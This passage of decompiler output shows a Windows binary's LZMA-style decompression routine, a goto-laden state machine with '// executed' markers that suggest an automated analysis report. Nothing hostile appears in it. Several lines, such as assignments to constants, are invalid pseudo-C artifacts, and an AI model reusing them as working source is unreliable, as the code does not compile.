														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
